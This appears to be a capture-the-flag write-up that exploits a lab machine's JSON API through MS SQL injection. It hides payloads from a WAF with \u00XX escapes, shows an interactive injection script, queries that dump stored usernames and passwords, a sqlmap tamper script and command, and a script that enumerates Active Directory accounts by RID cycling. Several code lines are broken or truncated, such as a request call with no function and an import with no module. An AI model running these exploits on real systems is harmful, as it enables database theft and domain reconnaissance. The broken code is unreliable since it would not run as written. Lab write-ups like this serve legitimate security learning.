Automate MS SQL injection with a custom sqlmap tamper script to bypass WAF through a UTF-16BE encoded JSON payload. Enumerate AD domain users via RID cycling from within the MS SQL DBMS.

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Manual exploitation

JSON format can understand various encodings including UTF-16BE like follows: \u00XX. The payload ' OR 1=1-- -, for example, will turn into \u0027\u0020\u004f\u0052\u0020\u0031\u003d\u0031\u002d\u002d\u0020\u002d after being encoded. I will abuse that fact to bypass WAF (that blocked pretty much everything) and script the injection:

#!/usr/bin/env python3

# Usage: rlwrap ./

from binascii import hexlify

import requests

URL = 'http://multimaster.megacorp.local/api/getColleagues'
HEADERS = {'Content-Type': 'application/json;charset=utf-8'}

# SELECT id,name,position,email,src FROM users WHERE name LIKE '?%'

while True:
	payload = input('SQLi> ')
	payload = hexlify(payload.encode()).decode()
	payload = [r'\u00'+payload[i:i+2] for i in range(0, len(payload), 2)]
	payload = ''.join(payload)
	data = r'{"name":"' + payload + r'"}'
	proxies = {'http': ''}
	resp =, headers=HEADERS, data=data, proxies=proxies)

Then I will use MS SQL STUFF() function to emulate MySQL group_concat() behavior and dump Hub_DB..Logins table:

SQLi> 1337' union select '1',STUFF((SELECT ',' + name FROM master..sysdatabases FOR XML PATH ('')), 1, 1, ''),'3','4','5';-- -
SQLi> 1337' union select '1',STUFF((SELECT ',' + name FROM Hub_DB..sysobjects WHERE xtype = 'U' FOR XML PATH ('')), 1, 1, ''),'3','4','5';-- -
SQLi> 1337' union select '1',STUFF((SELECT ',' + + ':' + TYPE_NAME(Hub_DB..syscolumns.xtype) FROM Hub_DB..syscolumns, Hub_DB..sysobjects WHERE AND'Logins' FOR XML PATH ('')), 1, 1, ''),'3','4','5';-- -
SQLi> 1337' union select '1',STUFF((SELECT ',' + username + ':' + password FROM Hub_DB..Logins FOR XML PATH ('')), 1, 1, ''),'3','4','5';-- -



To teach sqlmap how to exploit this vulnerability with WAF bypass I will write a custom tamper that converts my payload to UTF-16BE string:

#!/usr/bin/env python3

# /usr/share/sqlmap/tamper/

Copyright (c) 2006-2020 sqlmap developers (
See the file 'LICENSE' for copying permission

import re
from binascii import hexlify

from import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():

def tamper(payload, **kwargs):
	retVal = payload

	if payload:
		retVal = hexlify(retVal.encode()).decode()
		retVal = [r'\u00'+retVal[i:i+2] for i in range(0, len(retVal), 2)]
		retVal = ''.join(retVal)

	return retVal

Now I can dump all the databases:

root@kali:$ sqlmap --batch -u 'http://multimaster.megacorp.local/api/getColleagues' --method POST -H 'Content-Type: application/json;charset=utf-8' --data '{"name":"*"}' --dbms mssql -p name --delay 2 --technique U --union-cols 5 --union-char 1337 --tamper utf16be --dump --proxy




And this is how the requests looks like for real (Burp Suite):


However, after all this stuff I was pointed out that there was already a ready-made tamper script doing literally the same thing… Just had to google it a little bit more :expressionless:

Details here: Bypassing WAFs with JSON Unicode Escape Sequences - TrustFoundry

RID Cycling

Unfortunately, these users were not enough to login at least somewhere, so I will write a script to brute force some RIDs from within the MS SQL Server:

#!/usr/bin/env python3

import time
from binascii import hexlify
from base64 import b64encode, b64decode

import requests
import sid

URL = 'http://multimaster.megacorp.local/api/getColleagues'
HEADERS = {'Content-Type': 'application/json;charset=utf-8'}

class SQL:

	SELECT id,name,position,email,src FROM users WHERE name LIKE '?%'

	def inject(self, payload, mode='sname'):
		query = """1337' UNION SELECT '1',(SELECT CAST(N'' AS XML).value('xs:base64Binary(xs:hexBinary(sql:column("bin")))', 'VARCHAR(MAX)') Base64Encoding FROM (SELECT CAST(%s AS VARBINARY(MAX)) AS bin) AS bin_sql_server_temp),'3','4','5'-- -"""

		if mode == 'sname':  # input sid, output username
			func = "SUSER_SNAME(0x%s)"
			sid_mode = sid.SID_STRING
			payload = sid.sid(payload).binary()
			payload = hexlify(payload).decode()
			payload = payload.upper()
		elif mode == 'sid':  # input username, output sid
			func = "SUSER_SID('%s')"
			sid_mode = sid.SID_BASE64

		query = query % func % payload

		data = r'{"name":"' + self.waf_bypass(query) + r'"}'
		proxies = {'http': ''}
		resp =, headers=HEADERS, data=data)

		out = resp.json()[0]['name']

		if mode == 'sname':
			return b64decode(out.encode()).decode()
		elif mode == 'sid':
			return sid.sid(out, sid_mode).str()

	def waf_bypass(self, payload):
		payload = hexlify(payload.encode()).decode()
		payload = [r'\u00'+payload[i:i+2] for i in range(0, len(payload), 2)]
		payload = ''.join(payload)
		return payload

# print(SQL().inject('Administrator', mode='sid'))  # S-1-5-21-3167813660-1240564177-918740779-500

sql = SQL()
for rid in range(1000, 2000):
	s = f'S-1-5-21-3167813660-1240564177-918740779-{rid}'
	o = sql.inject(s)
	if o:
		print(f'{s} => {o}')

The script uses an SQL query to encode output of SUSER_SNAME() and SUSER_SID() to Base64 and then asks the server about the SIDs it knows. The basic (domain) SID is found by quering SUSER_SID('Administrator'). For converting between varbinary SID and common string SID I used a 3rd party module python-sid.

